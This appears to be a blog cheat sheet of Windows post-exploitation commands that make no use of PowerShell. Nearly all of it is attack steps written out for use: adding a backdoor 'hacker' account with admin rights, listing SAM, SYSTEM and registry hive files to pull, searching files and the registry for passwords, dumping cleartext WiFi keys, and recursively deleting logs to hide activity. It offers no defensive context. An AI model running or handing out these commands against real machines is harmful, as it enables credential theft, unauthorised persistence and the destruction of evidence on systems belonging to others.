Day 26: The Complete List of Windows Post-Exploitation Commands (No Powershell)

  • I WAS VERY PUSHED FOR TIME TODAY, I HAVE A LOT MORE TO ADD SO PLEASE KEEP CHECKING AS THIS WILL GROW AND GROW! I will also try and organise this better and add my smart recon scripts. ❤

Current User

whoami /all

On older machines, whoami might not be available so to find out the current user try the following:

echo %username%

All Users

net user

Add User

net user hacker hack3d /add

Make User Admin

net localgroup administrators hacker/add

Remove User

net user hacker /del

Files

type %SYSTEMDRIVE%\boot.ini
type %WINDIR%\win.ini
type %WINDIR%\System32\drivers\etc\hosts

Files to Pull

%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
%WINDIR%\System32\drivers\etc\hosts

Host Information

systeminfo
driverquery
tasklist
fsutil fsinfo drives
set
qwinsta
net time
net file
net session
net use

If you are looking for kernal exploit targets, you can try using findstr like so…

driverquery | findstr Kernel

Services

sc queryex type= service state= all
netstat -ano

Query a specific service:

sc query <SERVICE NAME>

Start a service:

sc start <SERVICE NAME>

Stop a service:

sc stop <SERVICE NAME>

Kill a Task

taskkill f /pid 1337

List System Logs

wevtutil el

Delete Logs

del \*.log /a /s /q /f

Scheduled Tasks

schtasks /query /fo LIST /v

Installed Software

wmic product get name /value

Uninstall Software

wmic product where name="<NAME>" call uninstall /INTERACTIVE:OFF

Search for Keywords (e.g *pass)

dir /s *pass* == *key* == *vnc* == *.config*

The above also looks for key, vnc and config.

Only in certain files…

findstr /si pass *.xml *.ini *.txt

Grep Registries…

reg query HKLM /f pass /t REG_SZ /s
reg query HKCU /f pass /t REG_SZ /s

WiFi Clear Text Passwords

Find AP SSID

netsh wlan show profile

Get Cleartext Pass

netsh wlan show profile <SSID> key=clear